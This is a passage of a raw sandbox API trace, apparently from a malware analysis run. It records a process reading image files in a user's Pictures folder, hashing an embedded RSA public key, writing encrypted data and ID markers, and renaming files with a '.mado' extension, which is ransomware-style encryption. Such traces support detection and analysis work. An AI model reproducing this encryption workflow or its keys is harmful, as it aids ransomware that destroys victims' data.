lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe520 [0204.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4d8 [0204.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4f0 [0204.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4c0 [0204.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe538 [0204.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe508 [0204.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe550 [0204.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4d8 | out: hHeap=0x2c0000) returned 1 [0204.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4d8 [0204.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c8d0 [0204.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe520 | out: hHeap=0x2c0000) returned 1 [0204.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bb80 [0204.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe550 | out: hHeap=0x2c0000) returned 1 [0204.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b74b68 [0204.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6bdb0 [0204.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bec8 [0204.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4d8 | out: hHeap=0x2c0000) returned 1 [0204.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74d80 [0204.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0204.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0204.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0204.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0204.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74d80 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe508 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe538 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4f0 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4c0 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4a8 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80df8 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.820] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0xa3bc, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0xa3bc, lpOverlapped=0x0) returned 1 [0204.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0204.821] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xa3c1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.821] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0204.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0204.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.821] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0204.821] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.821] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.821] CloseHandle (hObject=0x63c) returned 1 [0204.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0204.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b74b68 [0204.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0204.823] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NRTnKoCxG5zieJolr.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nrtnkocxg5ziejolr.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NRTnKoCxG5zieJolr.bmp.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nrtnkocxg5ziejolr.bmp.mado")) returned 1 [0204.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.823] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.825] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e42cda0, ftCreationTime.dwHighDateTime=0x1d5e2fe, ftLastAccessTime.dwLowDateTime=0x4370900, ftLastAccessTime.dwHighDateTime=0x1d5d97e, ftLastWriteTime.dwLowDateTime=0x4370900, ftLastWriteTime.dwHighDateTime=0x1d5d97e, nFileSizeHigh=0x0, nFileSizeLow=0x14b9d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vOxd2i6c5Aquj.jpg", cAlternateFileName="VOXD2I~1.JPG")) returned 1 [0204.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.825] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vOxd2i6c5Aquj.jpg") returned=".jpg" [0204.825] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vOxd2i6c5Aquj.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\voxd2i6c5aquj.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.825] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=84893) returned 1 [0204.825] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.828] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x14b77, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.828] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.829] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.829] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x14b9d, lpOverlapped=0x0) returned 1 [0204.830] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.830] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.830] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.830] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0204.831] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.831] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.831] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.831] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.831] GetLastError () returned 0x0 [0204.832] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.832] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0204.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.832] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.832] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.832] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14ba0) returned 0x3b81690 [0204.832] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80df8 [0204.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4a8 [0204.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80e40 [0204.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4c0 [0204.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4f0 [0204.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe538 [0204.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe508 [0204.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b72b80 [0204.833] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c8d0 [0204.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4f0 | out: hHeap=0x2c0000) returned 1 [0204.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe508 | out: hHeap=0x2c0000) returned 1 [0204.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe538 | out: hHeap=0x2c0000) returned 1 [0204.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe538 [0204.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0204.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe508 [0204.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0204.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe4f0 [0204.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6eb80 [0204.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6ec98 [0204.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe508 | out: hHeap=0x2c0000) returned 1 [0204.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4f0 | out: hHeap=0x2c0000) returned 1 [0204.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.834] HeapFree (in: hHeap=0x2c0000, 